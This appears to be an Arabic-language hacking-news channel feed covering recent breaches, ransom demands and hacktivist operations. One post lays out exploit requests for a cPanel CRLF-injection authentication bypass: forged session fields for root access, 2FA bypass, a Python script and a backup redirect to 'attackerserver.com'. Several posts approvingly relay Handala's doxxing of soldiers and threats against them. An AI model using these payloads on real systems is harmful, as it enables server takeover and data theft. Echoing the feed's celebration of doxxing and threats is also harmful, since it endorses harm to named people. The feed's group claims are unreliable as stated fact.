Hacker News

أما عربيا فمس الاختراق جامعة الملك عبد الله للعلوم والتقنية (KAUST) في السعودية. جامعة خليفة وجامعة زايد في الإمارات، والجامعة الأمريكية في بيروت (AUB) والجامعة الأمريكية بالقاهرة (AUC)، وجامعة الشهيد حمة لخضر بالوادي بالجزائر التي تستخدم أنظمة مرتبطة بمنصة Canvas. #HackerNews #ShinyHunters #Canvas

تعرضت 9000 جامعة ومؤسسات تعليمية كبرى حول العالم لاختراق إلكتروني واسع النطاق استهدف نظام إدارة التعلم Canvas التابع لشركة "Instructure"، شمل الاختراق بيانات نحو 275 مليون مستخدم، وتضمنت المعلومات المسربة الأسماء، وعناوين البريد الإلكتروني، وأرقام هوية الطلاب، والرسائل الخاصة المتبادلة داخل النظام. وتوقف نظام Canvas في جامعة ميسوري الأمريكي عن العمل وظهرت رسالة من مجموعة القرصنة "ShinyHunters" على الصفحة الرئيسية للنظام، وأعلنت مجموعة القراصنة مسؤوليتها عن الهجوم، مطالبة بفدية مالية مقابل عدم تسريب البيانات. شمل الاختراق جامعات أمريكية مرموقة مثل هارفارد، ستانفورد، معهد ماساتشوستس للتكنولوجيا وجامعة كولومبيا، بالإضافة إلى مناطق تعليمية ضخمة حيث تستخدم 41% من مؤسسات التعليم العالي في أمريكا الشمالية نظام Canvas. في أستراليا تأثرت أكثر من 25 جامعة ومؤسسة تعليم مهني، منها جامعة سيدني، جامعة ملبورن، جامعة كوينزلاند، بالإضافة إلى مدارس حكومية في عدة ولايات أسترالية. في هولندا تأثرت نحو 44 مؤسسة تعليمية، تشمل جامعات كبرى مثل جامعة أمستردام، وجامعة إيراسموس روتردام، وجامعة ليدن. #HackerNews #ShinyHunters #Canvas

اختراق شركة Mindafim الصهيونية من طرف فريق الفلاقة 🕵️‍♂️💻 #HackerNews 🚨 #FallagaTeam 🇵🇸

أعلنت مجموعة "حنظلة" اليوم عن تنفيذ هجوم سيبراني استهدف البنية التحتية الدفاعية في ميناء الفجيرة الإماراتي، وأعلنت المجموعة أنها اخترقت أنظمة الحماية الرقمية الخاصة بالمنشآت النفطية لشل قدرتها الدفاعية وذلك لحظات قبل أن تشن إيران هجمات صاروخية استهدفت ميناء الفجيرة. وذكرت مجموعة "حنظلة" أنها حصلت على آلاف الوثائق بما في ذلك تفاصيل العقود، وحركة السفن، والمعاملات المالية، وخرائط بالغة السرية لخطوط أنابيب النفط والبنية التحتية في الفجيرة، وقد تم تحويلها مباشرة لوحدات الصواريخ التابعة لمحور المقاومة. وأضافت مجموعة الهاكرز أنها نسقت عملياتها مع الحرس الثوري، ليتم استهداف ميناء الفجيرة بضربات صاروخية دقيقة.

الهدف من هذه العمليات، حسب بيان المجموعة، هو الرد على تعاون الإمارات مع الكيان الصهيوني والولايات المتحدة، والأعمال القذرة التي تقف وراءها حكومة الإمارات.

#HackerNews #Handala

يقوم المهاجم بإرسال محارف r\n\ أو ما یُعرف بـ %0D%0A (التي تعني سطر جديد) داخل طلب تسجيل الدخول. هذا يخدع النظام ويجعله يكتب أسطراً إضافية داخل ملف الجلسة المخزن على السيرفر. مثال توضیحي لھیكل الطلب (PoC): یرسل المهاجم طلب GET أو POST إلى مسار تسجیل الدخول، ویقوم بحقن المعاملات داخل اسم المستخدم أو حقل مخصص بالشكل التالي:

GET /login/?user=admin%0D%0Aauthenticated=1%0D%0Auser=root%0D%0A HTTP/1.1
Host: your-cpanel-server.com

شرح ما یحدث خلف الكوالیس: .1 الحقن: عند استقبال السیرفر لھذا الطلب، یقوم بمعالجة حقل user . .2 التلاعب بالملف: بسبب وجود %0D%0A (أصل الثغرة)، یظن نظام إنشاء الجلسات أن ھذه الأسطر ھي "خصائص" جدیدة للجلسة. .3 تزییف الصلاحیات: بدلاً من كتابة سطر واحد یحتوي على اسم المستخدم، یكتب السیرفر في ملف الجلسة الداخلي: -user: admin 1 -2 1 :authenticated تمت المصادقة -3 user: root تغییر ھویة المستخدم إلى الجذر -4 النتیجة: عندما یعود النظام لقراءة ملف الجلسة لیرى ھل ھذا المستخدم مسموح لھ بالدخول، یجد أن قیمة authenticated ھي 1 (نعم)، فیسمح بالدخول فوراً بصلاحیات root . سیناریوھات لاستغلال الثغرة : 1. تجاوز التحقق بخطوتین: ھذا ھو السیناریو الأكثر خطورة. حتى لو كان لدى مدیر السیرفر نظام Authenticator Google أو رسائل SMS، فإن الحقن عبر CRLF یسمح للمھاجم بإضافة سطر 1=tfa_verified أو mfa_passed=true داخل ملف الجلسة. ھذا یجعل النظام "یعتقد" أن المستخدم قد أدخل رمز التحقق بنجاح، مما یسمح للمھاجم بالدخول مباشرة إلى لوحة WHM وتغییر كافة الإعدادات. مثال الطلب:

POST /login/ HTTP/1.1
User-Agent: %0D%0Aauthenticated=1%0D%0Atfa_passed=1%0D%0Auser=admin

2. سیناریو "الارتقاء بالصلاحیات" : في ھذا السیناریو، قد یكون لدى المھاجم حساب "موزع" (Reseller) أو حتى حساب استضافة عادي (User). یقوم المھاجم باستخدام الثغرة أثناء عملیة تسجیل الدخول لحساب محدود الصلاحیات، ویقوم بحقن قیم ترفع رتبة جلسته إلى root. ھذا یسمح له بالانتقال من إدارة موقع واحد إلى إدارة السیرفر بالكامل والوصول إلى بیانات جمیع المواقع الأخرى المستضافة. مثال الطلب:

GET /cpsessXXXXX/json-api/cpanel?user=myuser%0D%0Aapp=whm%0D%0Apriv=root

3. استھداف واجھة "WP Squared" : بما أن الثغرة تؤثر أیضاً على "WP Squared" المنتج الجدید من cPanel لإدارة وردبرس، یمكن للمھاجمین استھداف السیرفرات التي تشغل ھذه الخدمة للسیطرة على مئات مواقع وردبرس بضغطة واحدة، وزرع برمجیات خبیثة (Malware) أو طلب فدیة (Ransomware) من أصحاب المواقع. مثال الطلب:

GET /wps/api/v1/instances?search=%0D%0Arole=super_admin

4. استغلال "واجھة برمجة التطبیقات" (API Exploitation) : لا یقتصر الاستغلال على المتصفح فقط، فالمھاجمون یبرمجون "سكربتات" (Bots) تستخدم واجھة API الخاصة بـ cPanel لإرسال طلبات HTTP المفخخة بكمیات ھائلة. ھذا السیناریو یُستخدم لعمل Mass Defacement (تغییر واجھة آلاف المواقع في وقت قیاسي) أو تحویل السیرفرات المصابة إلى جزء من شبكة "بوت نت" لشن ھجمات DDoS. مثال الطلب:

python
headers = {'User-Agent': 'Mozilla/5.0\r\nauthenticated=1\r\nuser=root'
response = requests.get("https://target.com", headers=headers)

5. سرقة النسخ الاحتیاطیة: بمجرد الدخول بصلاحیات Root عبر الثغرة، لا یقوم المھاجم دائماً بتخریب الموقع؛ بل یتوجھ مباشرة إلى إعدادات النسخ الاحتیاطي. یقوم بتغییر وجھة النسخ الاحتیاطي ( Amazon S3 أو FTP خارجي) إلى سیرفر یمتلكه ھو، وبذلك یحصل على نسخة كاملة من بیانات العملاء، كلمات المرور، وقواعد البیانات بشكل صامت ودون لفت الانتباه. مثال الطلب:

POST /json-api/set_backup_config?%0D%0Adestination=ftp://attackerserver .com

ملاحظة: هذه الأمثلة لأغراض تعليمية ولا يتحمل الناشر أي سوء استخدام للمعلومات المنشورة. #HackerNews #cpanel #CVE_2026_41940

ظهرت مؤخرا ثغرة عالية الخطورة لـ "تجاوز نظام المصادقة" من نوع Injection CRLF في أشهر واجهة رسومية (GUI) في العالم لإدارة خوادم الويب وتسهيل استضافة المواقع وهي لوحة تحكم cPanel، تعتمد عليها أغلب شركات الاستضافة في العالم مثل Bluehost, HostGator, GoDaddy 🌐🔒 تُصنف هذه الثغرة (تحت المعرف CVE-2026-41940) كواحدة من أخطر الثغرات الأمنية لعام 2026، وحصلت على درجة خطورة قصوى 9.8/10 ⚠️. تكمن خطورتها في أنها تتيح للمهاجم تجاوز المصادقة تماماً والحصول على صلاحيات Root (المسؤول الأعلى) دون الحاجة لاسم مستخدم أو كلمة مرور 🚫🔑.

عندما يحاول أي مستخدم تسجيل الدخول، يقوم خادم cPanel (المعروف تقنياً بـ cpsrvd) بإنشاء "ملف جلسة" مؤقت على القرص الصلب لتخزين بيانات المحاولة 💾، وتم اكتشاف أن النظام لا يقوم بتنقية البيانات المدخلة في ترويسات HTTP (مثل Basic Auth) بشكل كافٍ، بسبب خلل في معالجة بيانات الجلسات وحقن بروتوكول CRLF، مما يسمح للمهاجم بالتلاعب بملفات الجلسة 🐛🕸.

#HackerNews 📰 #cpanel ⚙️ #CVE_2026_41940 🔞

تعرض اليوم بروتوكول Wasabi لهجوم استغلالي متعدد السلاسل أدى لسرقة 5 ملايين دولار 💸، ونجم الهجوم بعد حصول الهاكر على "مفتاح المشرف" الخاص بمحفظة الناشر 🔑، مما منح المخترق صلاحيات ترقية العقود الذكية للبروتوكول ⚙️. استخدم المهاجم المفتاح المخترق لمنح صلاحية المشرف لعقد خبيث 🦠، ثم أجرى ترقية غير مصرح بها لخزائن التداول (Perp Vaults) 🏦 وجمع الأصول، مما مكنه من سحب الأموال مباشرة 💰. شملت قائمة الأصول المسروقة مجموعة متنوعة من الرموز مثل WETH وUSDC وcbBTC ورموز أخرى مثل PEPE وMOG 📉. قام بروتوكول Wasabi بوقف جميع الأنشطة 🛑 وطلب من المستخدمين إلغاء جميع التصاريح (Revoke approvals) النشطة لعقود الخزائن المتضررة فوراً 🚨. تأسس بروتوكول Wasabi بواسطة شركة DKODA Labs ويقع مقره الرئيسي في نيويورك 🇺🇸، وهو منصة تمويل لامركزي متخصصة في تداول المشتقات والـ Perpetuals (العقود الدائمة) على الأصول التي يصعب تداولها في المنصات التقليدية، مثل العملات الميمية والرموز غير القابلة للاستبدال (NFTs) 🦄. #HackerNews #Wasabi

⚠️ تعرض الاتحاد الآسيوي لكرة القدم (AFC) لخرق بيانات ضخم، وقام هاكر يحمل الاسم المستعار "f*ckiewuckie" المرتبط بمجموعة القرصنة الشهيرة "ShinyHunters" بنشر قاعدة بيانات كاملة تضمنت جوازات سفر اللاعبين والمدربين من بينهم كريستيانو رونالدو لاعب النصر السعودي. 🛡💻 تضمنت الملفات المسربة كذلك صوراً ممسوحة ضوئياً لجوازات سفر دبلوماسية لبعض المسؤولين، وجداول بيانات (Excel/CSV) تحتوي على عناوين البريد الإلكتروني، وأرقام الهواتف، وتفاصيل التسجيل في البطولات القارية، تم نشرها على منتدى التسريبات PwnForums. 📂🌐 البيانات المسربة تشمل سجلات التسجيل في بطولة "دوري أبطال آسيا للنخبة" (AFC Champions League Elite)، وبما أن نادي النصر أحد الأندية الكبرى المشاركة، فإن بيانات لاعبيه وموظفيه جزء أساسي من قاعدة بيانات الاتحاد الآسيوي. ⚽️🏆 #HackerNews 📰 #CR7 ⚽️🇵🇹

نفذت مجموعة الهاكرز حنظلة وعيدها وسربت أسماء وتفاصيل شخصية لـ 2379 من جنود مشاة البحرية الأمريكية "المارينز" المتمركزين في الخليج العربي، واصفةً الاختراق بأنه دليل على "قدراتها التجسسية". 🕵️‍♂️📂 أعلنت مجموعة حنظلة أنها تمتلك معلومات تفصيلية عن أفراد الخدمة العسكرية، تشمل بيانات عائلية وعناوين سكنية وتحركاتهم اليومية، وألمحت إلى إمكانية الكشف عن المزيد من المعلومات لاحقًا. 📅🏠 ارتبط اسم مجموعة حنظلة بحوادث إلكترونية حديثة، من بينها اختراق شركة سترايكر للتكنولوجيا الطبية الأمريكية، واختراق حساب البريد الإلكتروني الشخصي لمدير مكتب التحقيقات الفيدرالي كاش باتيل، وكذا تسريبات واختراقات لأهم المؤسسات الصهيونية. 🏥📧 #HackerNews 🔍 #Handala 🎭

🚨 تعرضت شركة إيترون (Itron) الأمريكية العملاقة لعملية اختراق طالَت "أنظمة تقنية المعلومات الداخلية" 🕵️‍♂️، وهي شركة تكنولوجيا أمريكية عالمية رائدة، متخصصة في توفير حلول ذكية لإدارة موارد الطاقة (الكهرباء والغاز) ⚡️ والمياه 💧. 📢 أفادت الشركة في إفصاحها لهيئة الأوراق المالية والبورصات الأمريكية (SEC) بأن الاختراق ركز في شبكة تكنولوجيا المعلومات (IT) الداخلية والأنظمة المؤسسية، وأكدت أنه تم الوصول إلى أجزاء من الأنظمة المكتبية والداخلية للشركة 🏢. ⚠️ وأثار هذا الاختراق قلقاً واسعاً نظراً لدور الشركة الحيوي في البنية التحتية للطاقة والمياه عالمياً، كونها شريك لآلاف شركات الطاقة والمياه، مما يضع سلاسل التوريد الخاصة بالمرافق العامة تحت المجهر 🔍. > 💡 توفر شركة إيترون حلول ذكية لإدارة موارد الطاقة والمياه، وتقدم أجهزة قياس (عدادات ذكية) 📊 وأنظمة لتحليل الاستهلاك وتطوير البنى التحتية المتطورة للقياس (AMI) وإدارة البيانات وتقنيات لإنترنت الأشياء الصناعي (IIoT)، وتعمل مع أكثر من 7,700 شركة في أكثر من 100 دولة 🌍. 🔥 #HackerNews 🏭 #Itron

تلقى الجنود البحرية الأمريكية العاملين في القواعد الأمريكية بدول الخليج رسائل تهـديد مباشرة على هواتفهم عبر تطبيق واتساب. الرسائل التي أرسلتها مجموعة "حنظلة" تضمنت عبارات تهديد لهؤلاء الجنود وطلبت منهم أن يرسلوا وداعهم الأخير لعائلاتهم قبل أن تنقض عليهم المسيرات الإيرانية. وجاءت هذه الرسائل بعد ساعات من تحذير نشرته مجموعة القرصنة موجه "للبحرية الأمريكية" جاء فيه: (بحرية الولايات المتحدة أكثر عرضة للخطر من أي منظمة أخرى. في الساعات المقبلة، سيتم إثبات قوة حنظلة في التسلل لك. ستفهم ما المصير المؤلم الذي ينتظرك. كونوا مستعدين. نحن نعرف كيف نتعامل مع الحمقى وشركاء إبستين). وأضافت مجموعة حنظلة أن هويات وأرقام الجنود الأمريكيين في المنطقة لم تعد مخفية، وسيتم نشرها قريباً.

هذا وتلقى كذلك آلاف المحتلين الصهاينة اليوم رسائل مشابهة على هواتفهم تضمنت تهديدات مباشرة، لتثبت مجموعة حنظلة أن أي جدار أمني يمكن تجاوزه.

#HackerNews #Handala

أعلنت مجموعة القرصنة الإلكترونية "حنظلة" (Handala)، يوم السبت 25 أبريل 2026، عن تنفيذ عملية سيبرانية وصفتها بالتاريخية استهدفت وحدة "ماجلان" (الوحدة 212) التابعة لجيش الاحتلال الصهيوني، وهي وحدة نخبوية متخصصة في الاستطلاع والعمليات السرية وتتميز ضباطها بمستوى عالٍ من السرية. 🕵️‍♂️💻 وقالت مجموعة حنظلة أنها نجحت في اختراق بيانات 100 ضابط رفيع المستوى، ونشرت الهويات الكاملة والتفاصيل الدقيقة لـ 100 ضابط رفيع المستوى من وحدة ماجلان. > شملت التسريبات صوراً واضحة للوجوه، الأسماء الكاملة، الأرقام العسكرية، السجلات المهنية، وتفاصيل الاتصال الخاصة بهؤلاء المجرمين كاشفة عن عملاء ماجلان السريين حيث لم يعد بامكانهم التخفي. 📸🔓🕸 #HackerNews #Handala

تعرضت المجموعة البنكية الأكبر في إفريقيا ستاندرد بنك (Standard Bank Group) لعملية اختراق إلكتروني ضخم استهدف بيانات جميع فروع البنك المنتشرة في عدة دول إفريقية 🏦🔓. وأعلن هاكر يحمل الاسم المستعار Rootboy عبر منتدى Darkforums عن الاختراق، وسرب 1.2 تيرابايت من البيانات 📊، والتي تتضمن 154 مليون سجل من قواعد البيانات 💾. شملت البيانات التي نشرها "Rootboy" معلومات حساسة مثل أرقام الهويات الوطنية، وعناوين العملاء، وأرقام الحسابات، وتفاصيل بطاقات الائتمان 💳، بالإضافة إلى بيانات الموظفين المستخرجة من أنظمة إدارية مثل SAP وSharePoint 👥. > مجموعة ستاندرد بنك هي مؤسسة مالية ضخمة مقرها الرئيسي في جنوب أفريقيا ولها فروع في العديد من الدول الإفريقية 🌍، من بينها بنك ستانبيك أوغندا، وفروع في كينيا، تنزانيا، جنوب السودان، إثيوبيا، نيجيريا، غانا، ساحل العاج، أنغولا، جمهورية الكونغو الديمقراطية، بالإضافة لفروع خارج القارة في الإمارات، المملكة المتحدة وأمريكا 🇺🇸🇬🇧🇦🇪. #HackerNews #Rootboy #StandardBank

أعلنت مجموعة القرصنة الشهيرة ShinyHunters اليوم مسؤوليتها عن اختراق منصة التعليم العالمية Udemy، حيث ذكرت أنها حصلت على أكثر من 1.4 مليون سجل لمستخدمي الموقع 🕵️‍♂️🔓. وقالت المجموعة أن البيانات المخترقة تشمل مزيجاً من المعلومات الحساسة التي تتضمن بيانات تحديد الهوية الشخصية (PII) وتشمل الأسماء وعناوين البريد الإلكتروني، سجلات تتعلق بشركة Udemy نفسها ككيان تجاري، وسجلات طلاب المنصة 📂🔒. نشرت المجموعة تحذيراً رسمياً وتضمنت الرسالة عبارة تهديد صريحة: "اتخذوا القرار الصحيح، لا تكونوا العنوان القادم في الأخبار" ⚠️🚨، ومنحت المجموعة شركة Udemy مهلة حتى 27 أفريل 2026 للاستجابة لمطالبها قبل البدء في نشر البيانات علنياً ⏳📢.

مجموعة ShinyHunters جزء من تحالف أوسع يسمى "The Com"، يضم مجموعات مثل "Scattered Spider" و"Lapsus$" 🕸🕷.

#HackerNews #ShinyHunters #Udemy

في الـ 7 أبريل 2026 عُقد اجتماع طارئ رفيع المستوى جمع وزير الخزانة الأمريكي ورئيس مجلس الاحتياطي الفيدرالي ورؤساء بنك أوف أمريكا، وسيتي جروب، وويلز فارجو، وجولدمان ساكس، ومورجان ستانلي، لمناقشة قدرات هذا النموذج القادر على اكتشاف ثغرات أمنية غير مكتشفة والقيام باختراق البنية التحتية الأساسية للبنوك خلال ساعات فقط 🏦🔒. في 17 أبريل 2026، اجتمع المدير التنفيذي لشركة أنثروبيك مع كبار المسؤولين في البيت الأبيض لمناقشة سبل التعاون لضمان "النشر الآمن" للتقنية وحماية الأمن القومي 🏛🤝. كما حذر "الإنتربول" من أن تسريب هذا النموذج قد يحول أي مخترق هاوٍ إلى "إرهـ.ـابي سيبراني" يمتلك قدرات دول عظمى، مما يمحو الفجوة بين المهاجمين المحترفين والمبتدئين ⚠️💻. #HackerNews #Mythos

🚨 أفادت تقارير أن نموذج الذكاء الإصطناعي الخارق من شركة أنثروبيك المعروف باسم Mythos قد تعرض لوصول غير مصرح به من "جهة مجهولة". 🔓 تشير التقارير إلى أن الاختراق لم يكن "اختراقاً مباشراً" لأنظمة أنثروبيك، بل تم عبر بيئة بائع خارجي، حيث تمكن مستخدمين مجهولين عبر استخدام بيانات اعتماد مخترقة لشركة Mercor وهي شركة توظيف وتدريب ذكاء اصطناعي متعاونة مع أنثروبيك. 🕵️‍♂️ باستخدام تلك البيانات وبالاعتماد على نمط تسمية النماذج السابق لأنثروبيك، تمكن هؤلاء المستخدمون من "تخمين" الموقع الإلكتروني الداخلي للنموذج والوصول إليه في نفس يوم إعلان الشركة عن إطلاقه المحدود لنحو 40 شركة وجهة حكومية أمريكية نظرا لخطورته. 🇺🇸💻

يوصف نموذج Mythos بأنه أداة فائقة القوة في مجال الأمن السيبراني 🛡، حيث أثبت قدرته في الاختبارات الداخلية على اكتشاف "ثغرات يوم الصفر" لم تكن معروفة في أنظمة التشغيل والمتصفحات الرئيسية في غضون ساعات وهي ثغرات ظلت مخفية لعقود، وكذلك بناء استغلالات مركبة لتجاوز دفاعات معقدة والوصول إلى جذور النظام. ⚡️🔍

#HackerNews #Mythos

تعرض كل من بنك فروست (Frost Bank) 🏦 وبنك سيتيزنز (Citizens Bank) 🇺🇸 لتهديدات بتسريب بيانات حساسة بعد إدراجهما على موقع تسريبات تابع لعصابة الفدية المعروفة باسم "إيفرست" (Everest) 🔒. وقالت مجموعة الفدية "إيفرست" أنها تمكنت من الوصول إلى ملايين السجلات لبنك سيتيزنز 📂، وامتلاكها لسجلات تخص حوالي 250,000 عميل لبنك فروست 👥. أقر بنك "سيتيزنز" بتعرضه لواقعة أمنية مرتبطة بمزود خدمة خارجي (طرف ثالث) 🤝، وليس اختراقاً مباشراً لأنظمته الداخلية، وأعطى المخترقون البنكين مهلة 6 أيام ⏳ قبل البدء بنشر البيانات المسربة للعلن للضغط عليهما من أجل دفع الفدية 💰.

يعتبر بنك سيتيزنز واحدًا من أكبر 20 بنكًا في الولايات المتحدة 🇺🇸، بإجمالي أصول تقارب 220 مليار دولار 💵، أما بنك فروست تبلغ أصوله حوالي 53 مليار دولار مما يجعله ضمن قائمة أكبر 50 بنكًا أمريكيًا 📊.

#HackerNews 🔐 #Everest 🏔

تعرضت الوكالة الوطنية للوثائق المؤمنة (ANTS) الفرنسية لاختراق ضخم استهدف الوكالة المسؤولة عن إصدار أهم الوثائق الرسمية مثل جوازات السفر البيومترية، بطاقات الهوية، ورخص القيادة 🇫🇷🔓 وأعلن هاكر يحمل الاسم المستعار "breach3d" عرض قاعدة بيانات للبيع تحتوي على حوالي 19 مليون سجل لمواطنين فرنسيين تحتوي على الأسماء الكاملة وعناوين البريد الإلكتروني، تواريخ ومكان الميلاد، أرقام الهواتف والعناوين البريدية، ومعرفات الحسابات الحكومية (Account IDs) 💾👤 سخر "breach3d" من الدفاعات الرقمية الفرنسية، قائلاً إنها "هشة مثل الكرواسون" 🥐، وادعى أن الدافع وراء تسريب البيانات هو "معاقبة الحكومة الفرنسية على فشلها الأمني" رغم ادعاءاتهم المستمرة بالحماية ⚠️

فتح مكتب المدعي العام في باريس تحقيقا حول هذا الاختراق، وتم تفعيل خلية أزمة، وبدأت الوكالة بإخطار المتضررين فرداً فرداً، كما حذرت السلطات من أن هذه البيانات، رغم أنها لا تمنح وصولاً مباشراً للحسابات، إلا أنها "كنز" لعمليات انتحال الشخصية وهجمات التصيد الاحتيالي (Phishing) عالية الدقة 🕵️‍♂️🎣

#HackerNews #breach3d

القعقاع يضرب من جديد #HackerNews #القعقاع #العفاسي الله يهديه